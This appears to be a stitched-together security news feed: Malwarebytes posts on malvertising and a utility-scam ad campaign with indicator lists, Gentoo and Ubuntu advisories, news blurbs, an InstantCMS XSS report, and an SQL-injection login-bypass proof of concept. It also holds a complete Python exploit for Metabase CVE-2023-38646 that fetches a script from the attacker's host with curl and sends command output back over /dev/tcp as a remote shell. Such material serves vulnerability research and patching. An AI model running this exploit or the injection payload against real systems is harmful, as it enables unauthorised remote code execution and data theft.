Malvertising made a resurgence in 2023, with cybercriminals creating malicious ads and websites imitating Amazon, TradingView, and Rufus.

On the internet, people need to worry about more than just opening suspicious email attachments or entering their sensitive information into harmful websites—they also need to worry about their Google searches.

That’s because last year, as revealed in our 2024 ThreatDown State of Malware report, cybercriminals flocked to a malware _delivery_ method that doesn’t require they know a victim’s email address, login credentials, personal information, or, anything, really.

Instead, cybercriminals just need to fool someone into clicking on a search result that looks remarkably legitimate.

This is the work of “malicious advertising,” or “malvertising,” for short. Malvertising is not malware itself. Instead, it’s a sneaky process of placing malware, viruses, or other cyber infections on a person’s computer, tablet, or smart phone. The malware that eventually slips onto a person’s device comes in many varieties, but cybercriminals tend to favor malware that can steal a person’s login credentials and information. With this newly stolen information, cybercriminals can then pry into sensitive online accounts that belong to the victim.

But before any of that digital theft can occur, cybercriminals must first ensnare a victim, and they do this by abusing the digital ad infrastructure underpinning Google search results.

Think about searching on Google for “running shoes”—you’ll likely see ads for Nike and Adidas. A Google search for “best carry-on luggage” will invariably produce ads for the consumer brands Monos and Away. And a Google search for a brand like Amazon will show, as expected, ads for Amazon.

But cybercriminals know this, and in response, they’ve created ads that _look_ legitimate, but instead direct victims to malicious websites that carry malware. The websites themselves, too, bear a striking resemblance to whatever product or brand they’re imitating, so as to maintain a charade of legitimacy. From these websites, users download what they think is a valid piece of software, instead downloading malware that leaves them open to further attacks.

_A malicious ad for the KeePass password manager appears as a legitimate ad._

__The real KeePass website (left) side-by-side with a malvertising site (right)__.

It’s true that malvertising is often understood as a risk to businesses, but the copycat websites that are created by cybercriminals can and often do impersonate popular brands for everyday users, too.

As revealed in our 2024 ThreatDown State of Malware report, the five most impersonated brands for malvertising last year included:

1.  Amazon
2.  Rufus
3.  Weebly
4.  NotePad++
5.  TradingView

These five brands may not all carry the same familiarity, but their products and services capture a broad swath of user interest, from Weebly’s website creation products, to TradingView’s investment trading platform, to Rufus’s niche-but-useful portable OS booting tool.

****Why the increase in malvertising last year?****

If Google ads have been around for more than a decade, why are they only being abused by cybercriminals now? The truth is, malvertising has been around for years, but a particular resurgence was recorded more recently.

In 2022, cybercriminals lost access to one of their favorite methods of delivering malware.

That summer, Microsoft announced that it would finally block “macros” that were embedded into files that were downloaded from the internet. Macros are essentially instructions that users can program so that multiple tasks can be bundled together. The danger, though, is that cybercriminals would pre-program macros within certain files for Microsoft Word, Excel, or PowerPoint, and then send those files as malicious email attachments. Once those attachments were downloaded and opened by users, the embedded macros would trigger a set of instructions directing a person’s computer to install malware from a dangerous website online.

Macros were a scourge for cybersecurity for years, as they were effective and easy to deliver.

But when Microsoft restricted macro capabilities in 2022, cybercriminals needed to find another malware delivery channel. They focused on malvertising.

Today’s malvertising is increasingly sophisticated, as cybercriminals can create and purchase online ads that target specific types of users based on location and demographics. Concerningly, modern malvertising can even avoid basic fraud detection as cybercriminals can create websites that determine whether a user is a real person or simply a bot that is trawling the web to find and flag malicious activity.

****How to protect against malvertising****

The threat of malvertising is multi-layered: There are the fraudulent ads that cybercriminals place on Google search results, the malicious websites that imitate legitimate brands and companies to convince users to download malware, and the malware infection itself.

As such, any successful defense strategy must be multi-layered.

For safe browsing, people can rely on Malwarebytes Browser Guard, a browser extension that blocks third-party tracking and flags malicious websites known to be in the control of cybercriminals. As we wrote before:

> “Malwarebytes Browser Guard provides additional protection to standard ad-blocking features by covering a larger area of the attack chain all the way to domains controlled by attackers. Thanks to its built-in heuristic engine it can also proactively block never-before-seen malicious websites.”

The problem with malvertising, though, is that new malicious websites are created every single day. Cybersecurity defenders, then, are often caught in a game of catch-up.

Here, users can find safety from Malwarebytes Premium, which provides real-time protection to detect and stop any cyberthreats that get installed onto a device, even if those threats are masquerading as legitimate apps or software.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Malvertising: This cyberthreat isn’t on the dark web, it’s on Google 

InstantCMS version 2.16.1 suffers from a persistent cross site scripting vulnerability that appears to require administrative access.

    # Exploit Title: InstantCMS - Store XSS# Application: InstantCMS # Version: v2.16.1   # Bugs: Stored XSS# Technology: PHP# Vendor Homepage: https://instantcms.ru/# Software Link: https://instantcms.ru/get# Date: 14.09.2023# Author: SoSPiro# Tested on: Windows## DescriptionI noticed that you filtered the filter very carefully. But there are still some parts you missed## POC1 . Login with admin2 . Go to "http://localhost/o2/admin/menu/item_edit/18"3 . Insert payload in CSS class4 . Click save , and go to home page, and Detect store xss in footerhttps://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing## ImpactThis security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...## Bug fix commithttps://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156## Referencehttps://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/

InstantCMS 2.16.1 Cross Site Scripting

Gentoo Linux Security Advisory 202402-23 - Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution. Versions greater than or equal to 121.0.6167.139 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-23  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #922062, #922340, #922903, #923370  
       ID: 202402-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives, the worst of which can lead to remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web. Google  
Chrome is one fast, simple, and secure browser for all your devices.  
Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable        Unaffected  
-------------------------  ----------------  -----------------  
www-client/chromium        < 121.0.6167.139  >= 121.0.6167.139  
www-client/google-chrome   < 121.0.6167.139  >= 121.0.6167.139  
www-client/microsoft-edge  < 121.0.2277.83   >= 121.0.2277.83

Description  
===========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-121.0.6167.139"

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-121.0.6167.139"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-121.0.2277.83"

References  
==========

[ 1 ] CVE-2024-0333  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0333  
[ 2 ] CVE-2024-0517  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0517  
[ 3 ] CVE-2024-0518  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0518  
[ 4 ] CVE-2024-0519  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0519  
[ 5 ] CVE-2024-0804  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0804  
[ 6 ] CVE-2024-0805  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0805  
[ 7 ] CVE-2024-0806  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0806  
[ 8 ] CVE-2024-0807  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0807  
[ 9 ] CVE-2024-0808  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0808  
[ 10 ] CVE-2024-0809  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0809  
[ 11 ] CVE-2024-0810  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0810  
[ 12 ] CVE-2024-0811  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0811  
[ 13 ] CVE-2024-0812  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0812  
[ 14 ] CVE-2024-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0813  
[ 15 ] CVE-2024-0814  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0814  
[ 16 ] CVE-2024-1059  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1059  
[ 17 ] CVE-2024-1060  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1060  
[ 18 ] CVE-2024-1077  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1077

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-23

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-23

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

# Exploit Title: Employee Management System - SQL Injection  
# Google Dork: N/A  
# Application: Employee Management System   
# Date: 19.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Version: N/A  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'  
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:  
====================================================  
employee/Admin/login.php

<?php  
session_start();  
error_reporting(1);  
include('../connect.php');

//Get website details  
$sql_website = "select * from website_setting";   
$result_website = $conn->query($sql_website);  
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){

//Get Date  
date_default_timezone_set('Africa/Lagos');  
$current_date = date('Y-m-d h:i:s');

$email = $_POST['txtemail'];  
$password = $_POST['txtpassword'];  
$status = 'Active';

 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";  
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {  
  // output data of each row  
 ($row = mysqli_fetch_assoc($result));  
   $_SESSION["email"] = $row['email'];  
   $_SESSION["password"] = $row['password'];  
 $_SESSION["phone"] = $row['phone'];  
    $firstname = $row['firstname'];  
     $_SESSION["firstname"] = $row['firstname'];

     $fa = $row['2FA'];

  }

Employee Management System 1.0 SQL Injection

The Android banking trojan known as Anatsa has expanded its focus to include Slovakia, Slovenia, and Czechia as part of a new campaign observed in November 2023.
"Some of the droppers in the campaign successfully exploited the accessibility service, despite Google Play's enhanced detection and protection mechanisms," ThreatFabric said in a report shared with The Hacker News.

Anatsa Android Trojan Bypasses Google Play Security, Expands Reach to New Countries

Google has announced that it's open-sourcing Magika, an artificial intelligence (AI)-powered tool to identify file types, to help defenders accurately detect binary and textual file types.
"Magika outperforms conventional file identification methods providing an overall 30% accuracy boost and up to 95% higher precision on traditionally hard to identify, but potentially problematic content

Google Open Sources Magika: AI-Powered File Identification Tool

Malwarebytes researchers have discovered a prolific campaign of fraudulent energy ads shown to users via Google searches.

For many households, energy costs represent a significant part of their overall budget. And when customers want to discuss their bills or look for ways to save money, scammers are just a phone call away.

Enter the utility scam, where crooks pretend to be your utility company so they can threaten and extort as much money from you as they can.

This scam has been going on for years and usually starts with an unexpected phone call and, in some cases, a visit to your door. Obviously the phone call side of the scam is much more scalable and means the scam can be done from overseas.

However, criminals know that victims are more likely to be tricked if they were the ones who initiated the call. In a recent investigation, we discovered a prolific campaign of fraudulent ads shown to users via Google searches. To give an idea of scale, the number of ads we found exceeds what we have found in previous malvertising cases.

This blog post has two purposes: the first one is to draw awareness to this problem by showing how it works. Secondly, we’ve collected and shared as many ads and fake sites as we could in the hope that action will be taken, with hopefully some cost for the scammers.

**Fraudulent utility scam ads**

The scam begins when a user searches for keywords related to their energy bill. The ads are shown to mobile devices only, which makes sense given how often people use their phones. Also, the ads are geolocated, so that they are relevant to the user’s location.

We found 28 advertisers with over 300 ads, most of them registered by individuals from Pakistan. We have also seen legitimate but hacked advertiser accounts belonging to US entities that were abused. We didn’t investigate further into the whereabouts and identities of the scammers, but we should note that Pakistan is a possible location.

In most cases, tapping on the ad will not open a new website, but instead will prompt you to dial a phone number. This is exactly what the crooks want as many people will have no idea that an ad approved by Google could possibly be fraudulent.

The utility scam often works by threatening and scaring victims into making poor decisions. An unpaid bill, or an offer that is too good to be true and must be accepted immediately are some of their tactics. Once you’ve made that phone call, you’re already in their hands and very close to losing a significant amount of money.

The scammers may even redirect you to their website to “prove” that they are legitimate. Those sites are often credible enough for a victim to feel like they are doing the right thing, but that couldn’t be further from the truth.

**Large scamming infrastructure**

The crooks have registered dozens of different domains names and built templates that appear related to energy or utility savings. The sites are quite simple and consist of one main page with some customer-centric text and one or multiple phone numbers.

We can usually deduce they are fraudulent by looking up their registration date as well as connecting them with search ads.

However, that might not be enough to have them suspended without going through the whole process of calling the scammers, recording the interaction and showing that evidence. This type of investigation requires time and resources to be done properly. Perhaps one of the many scambaiters out there will look into it in the future.

In the meantime, we have tracked and reported as many domains as we could to the relevant registrars in the hope that some may take action and suspend them.

**Keep your identity and money safe from scammers**

This scam is widespread, and so our advice right now is to avoid clicking on any ad from search as the malicious ads largely outnumber the legitimate ones. You can tell it’s an ad as it will be labelled “Sponsored” or “Ad”.

Here are some additional tips:

*   **Watch out for a sense of urgency**. Scammers will often threaten to cut your power immediately. This and similar scare tactics are meant to pressure you into making hasty decisions. Take the time to look things up or speak to a friend before you do anything.
*   **Never disclose personal details** over the phone without being absolutely certain you are talking to the right person. If in doubt, hang up the phone and look for the official phone number from your energy company, perhaps from a past bill. Do not trust any phone number that appears on an online ad.
*   **Beware requests for money transfers or prepaid cards**. These are a huge sign you are dealing with criminals. Again, take your time to think it over even if just for a few hours. Scammers tend to be so impatient they will make all sorts of claims to act right now, which should be a dead giveaway.
*   **Contact your bank immediately** if you think you’ve been scammed and wired money,. Change all your passwords and add a notice with your utility company that someone may attempt to impersonate you.
*   **Report the scam** to the proper authorities, which may be the FTC.

**Malwarebytes protection**

Malwarebytes is working with its partners to go after these scammers. We also provide protection if you are using our iOS app via the ad blocking feature which will disable search ads and other ads that may be targeting you.

**Indicators of Compromise**

**Google advertiser accounts**

**Advertiser name**

**Advertiser ID**

**Number of ads**

Telesoft

N/A

1

Digitron

04170244641179828225

4

Syed muhammad Adnan

08157637715521699841

15

Progressix

02149758434478653441

2

Umair Jameel

11899369518209695745

1

Laiba Mazhar

14248337572488019969

1

Syed Shahmeer Hussain

12265272419404480513

6

Snow Tech

N/A

1

Muhammad Pirzada

12480474916866490369

145

Eco Designs (Private) Limited

17013467067027816449

5

Right Path Solutions

11370048952557633537

21

Rehman Munawar

06906645958470139905

1

ANDREW PAUL GUZMAN

09045338907926855681

17

Economical Deals

09045708721790910465

4

Qasim Ahmed

15768816743289454593

20

Summaira

14596269127925497857

3

Citrex Solutions (Private) Limited

16648988995463675905

19

Get Energy Promo

08074609881656590337

6

Brightboost LLC

07744256527850012673

5

AA DIGITAL LABS (SMC-PRIVATE) LIMITED

10871392529253662721

1

Malik Muhammad Shahroz Ibrahim

N/A

1

HongKong AdTiger Media Co., Limited

14567350391567024129

1

Mah Noor

07681945004880691201

12

Usama Ashfaq

06711852389684477953

2

Ali Raza

04534984293432164353

15

Muhammad Usman Tariq

17723433991509377025

5

SHABNUM FATIMA SHAH

02536959185141104641

4

QASMIC L.L.C-FZ

11321807192694194177

1

**Phone numbers**

888\[-\]960\[-\]3984  
888\[-\]315\[-\]9188  
888\[-\]715\[-\]1808  
888\[-\]873\[-\]0295  
888\[-\]317\[-\]0580  
888\[-\]316\[-\]0466  
888\[-\]983\[-\]0288  
888\[-\]439\[-\]0639  
888\[-\]312\[-\]2983  
844\[-\]967\[-\]9649  
855\[-\]200\[-\]3417  
888\[-\]842\[-\]0793  
888\[-\]207\[-\]3713  
833\[-\]435\[-\]0029  
888\[-\]494\[-\]4956

888\[-\]928\[-\]6404  
888\[-\]374\[-\]1693  
888\[-\]834\[-\]1050  
888\[-\]497\[-\]3560  
888\[-\]960\[-\]2303  
888\[-\]430\[-\]0128  
800\[-\]353\[-\]5613  
888\[-\]407\[-\]1004  
855\[-\]216\[-\]2411  
844\[-\]679\[-\]7635  
888\[-\]483\[-\]2851  
888\[-\]657\[-\]2401  
888\[-\]580\[-\]0106  
888\[-\]326\[-\]7299  
888\[-\]870\[-\]2661

888\[-\]203\[-\]1692  
855\[-\]428\[-\]7345  
888\[-\]641\[-\]0108  
888\[-\]960\[-\]0688  
888\[-\]347\[-\]7462  
888\[-\]448\[-\]0550  
888\[-\]834\[-\]0998  
888\[-\]470\[-\]8496  
888\[-\]554\[-\]0461  
855\[-\]980\[-\]1080  
888\[-\]539\[-\]0722  
866\[-\]685\[-\]0355  
888\[-\]715\[-\]1806  
888\[-\]960\[-\]2550  
888\[-\]641\[-\]0096  
888\[-\]996\[-\]5133

**Scammer domains**

360billingservices\[.\]com  
aadigital\[.\]online  
citrexsolutions\[.\]co  
digitelcare\[.\]com  
eco-designs\[.\]store  
economical-deals\[.\]co  
electricenergybundle\[.\]com  
electricenergyservice\[.\]com  
electricpowerdeal\[.\]com  
energpaybill\[.\]com  

energybilling\[.\]net  
energybillservice\[.\]online  
energycredits\[.\]online  
energyhelpcenter\[.\]com  
energypayment\[.\]shop  
energypoweroffer\[.\]com  
globalenergysolutionz\[.\]com  
homeutilityservices\[.\]com  
makeabillpayment\[.\]com  
paysenergy\[.\]online

powerelectricoffers\[.\]com  
qasmic\[.\]com  
rebornsolutions\[.\]co  
telecombilling\[.\]us  
telecomcredits\[.\]us  
thepowerpayllc\[.\]org  
uenergyproviders\[.\]store  
utilitybillsolution\[.\]site  
utilitybillspayments\[.\]org  
utilitydiscounts\[.\]store  
utilityservices\[.\]us

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Massive utility scam campaign spreads via online ads 

Ubuntu Security Notice 6635-1 - It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service. Lucas Leong discovered that the netfilter subsystem in the Linux kernel did not properly validate some attributes passed from userspace. A local attacker could use this to cause a denial of service or possibly expose sensitive information.

    =========================================================================Ubuntu Security Notice USN-6635-1February 14, 2024linux-gcp-6.2 vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gcp-6.2: Linux kernel for Google Cloud Platform (GCP) systemsDetails:It was discovered that the USB subsystem in the Linux kernel contained arace condition while handling device descriptors in certain situations,leading to a out-of-bounds read vulnerability. A local attacker couldpossibly use this to cause a denial of service (system crash).(CVE-2023-37453)Lucas Leong discovered that the netfilter subsystem in the Linux kernel didnot properly validate some attributes passed from userspace. A localattacker could use this to cause a denial of service (system crash) orpossibly expose sensitive information (kernel memory). (CVE-2023-39189)Sunjoo Park discovered that the netfilter subsystem in the Linux kernel didnot properly validate u32 packets content, leading to an out-of-bounds readvulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2023-39192)Lucas Leong discovered that the netfilter subsystem in the Linux kernel didnot properly validate SCTP data, leading to an out-of-bounds readvulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2023-39193)Kyle Zeng discovered that the IPv4 implementation in the Linux kernel didnot properly handle socket buffers (skb) when performing IP routing incertain circumstances, leading to a null pointer dereference vulnerability.A privileged attacker could use this to cause a denial of service (systemcrash). (CVE-2023-42754)Jason Wang discovered that the virtio ring implementation in the Linuxkernel did not properly handle iov buffers in some situations. A localattacker in a guest VM could use this to cause a denial of service (hostsystem crash). (CVE-2023-5158)Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kerneldid not properly handle queue initialization failures in certainsituations, leading to a use-after-free vulnerability. A remote attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-5178)Budimir Markovic discovered that the perf subsystem in the Linux kernel didnot properly handle event groups, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-5717)It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate the server frame size in certainsituation, leading to an out-of-bounds read vulnerability. An attackercould use this to construct a malicious CIFS image that, when operated on,could cause a denial of service (system crash) or possibly expose sensitiveinformation. (CVE-2023-6606)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle inactive elements in its PIPAPO data structure, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-6817)Budimir Markovic, Lucas De Marchi, and Pengfei Xu discovered that the perfsubsystem in the Linux kernel did not properly validate all event sizeswhen attaching new events, leading to an out-of-bounds write vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6931)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Kevin Rich discovered that the netfilter subsystem in the Linux kernel didnot properly check deactivated elements in certain situations, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-0193)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  linux-image-6.2.0-1021-gcp      6.2.0-1021.23~22.04.1  linux-image-gcp                 6.2.0.1021.23~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6635-1  CVE-2023-37453, CVE-2023-39189, CVE-2023-39192, CVE-2023-39193,  CVE-2023-42754, CVE-2023-5158, CVE-2023-5178, CVE-2023-5717,  CVE-2023-6606, CVE-2023-6817, CVE-2023-6931, CVE-2023-6932,  CVE-2024-0193Package Information:  https://launchpad.net/ubuntu/+source/linux-gcp-6.2/6.2.0-1021.23~22.04.1

Ubuntu Security Notice USN-6635-1

Metabase version 0.46.6 pre-authentication remote code execution exploit.

    # Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution# Google Dork: N/A# Date: 13-10-2023# Exploit Author: Musyoka Ian# Vendor Homepage: https://www.metabase.com/# Software Link: https://www.metabase.com/# Version: metabase 0.46.6# Tested on: Ubuntu 22.04, metabase 0.46.6# CVE : CVE-2023-38646#!/usr/bin/env python3import socketfrom http.server import HTTPServer, BaseHTTPRequestHandlerfrom typing import Anyimport requestsfrom socketserver import ThreadingMixInimport threadingimport sysimport argparsefrom termcolor import coloredfrom cmd import Cmdimport refrom base64 import b64decodeclass Termial(Cmd):    prompt = "metabase_shell > "    def default(self,args):        shell(args)class Handler(BaseHTTPRequestHandler):    def do_GET(self):        global success        if self.path == "/exploitable":                        self.send_response(200)            self.end_headers()            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0  > /dev/tcp/{argument.lhost}/{argument.lport}".encode())            success = True        else:            print(self.path)            #sys.exit(1)    def log_message(self, format: str, *args: Any) -> None:        return Noneclass Server(HTTPServer):    passdef run():    global httpserver    httpserver = Server(("0.0.0.0", argument.sport), Handler)    httpserver.serve_forever()def exploit():    global success, setup_token    print(colored("[*] Retriving setup token", "green"))    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)    print(colored(f"[+] Setup token: {setup_token}", "green"))    print(colored("[*] Tesing if metabase is vulnerable", "green"))    payload = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-musyoka",                "engine": "h2"                }                }    timer = 0    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))    thread = threading.Thread(target=run, )    thread.start()    while timer != 120:        test = requests.post(f"{argument.url}/api/setup/validate", json=payload)        if success == True :            print(colored("[+] Metabase version seems exploitable", "green"))            break        elif timer == 120:            print(colored("[-] Service does not seem exploitable exiting ......", "red"))            sys.exit(1)    print(colored("[+] Exploiting the server", "red"))        terminal = Termial()    terminal.cmdloop()def shell(command):    global setup_token, payload2    payload2 = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-team",                "engine": "h2"                }                }        output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)    bind_thread = threading.Thread(target=bind_function, )    bind_thread.start()    #updating the payload    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"    requests.post(f"{argument.url}/api/setup/validate", json=payload2)    #print(output.text)def bind_function():    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.bind(("0.0.0.0", argument.lport))        sock.listen()        conn, addr = sock.accept()        data = conn.recv(10240).decode("ascii")        print(f"\n{(b64decode(data)).decode()}")    except Exception as ex:        print(colored(f"[-] Error: {ex}", "red"))        pass    if __name__ == "__main__":    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)    argument  = args.parse_args()    if argument.url.endswith("/"):        argument.url = argument.url[:-1]    success = False    exploit()

Metabase 0.46.6 Remote Code Execution

By Waqas
Is your ChatGPT down? Or, are you experiencing issues accessing ChatGPT? If so, you’re not alone. ChatGPT has…
This is a post from HackRead.com Read the original post: ChatGPT Down? Anonymous Sudan Claims Responsibility for DDoS Attacks

Is your ChatGPT down? Or, are you experiencing issues accessing ChatGPT? If so, you’re not alone. ChatGPT has been encountering service disruptions and numerous errors lately. The cause appears to be DDoS attacks, possibly instigated by Anonymous Sudan.

Anonymous Sudan, a now prominent group of hacktivists, has claimed responsibility for targeting ChatGPT and its parent company, OpenAI, with a series of DDoS attacks.

Anonymous Sudan also referenced alleged tweets attributed to Tal Broda, Head of Research Platform at OpenAI. The screenshots of these tweets depict Tal denying the existence of Palestine and criticizing calls for a ceasefire in Gaza.

According to Anonymous Sudan, they plan to continue their DDoS attacks until OpenAI implements behavioural changes to ChatGPT to prevent the propagation of what they deem as “dehumanizing views of Palestinians.” Additionally, they demand the removal of Tal Broda from his position at OpenAI.

Anonymous Sudan on Telegram (Screenshots: Hackread.com)

On the contrary, ChatGPT’s Status Page confirms service disruptions, including login issues. It also notes an “Elevated error rate impacting ChatGPT,” indicating a higher-than-usual number of errors occurring within the system or process. Such errors could arise from various factors, including faulty hardware, software bugs, network issues, DDoS attacks, or even human error.

Nevertheless, OpenAI is actively monitoring the situation and working to resolve the issue. However, as of now, there has been no official confirmation or acknowledgement from OpenAI regarding the company experiencing cyber attacks or the specific reasons behind the ChatGPT errors that users have been reporting since this afternoon.

****Anonymous Sudan vs ChatGPT and OpenAI****

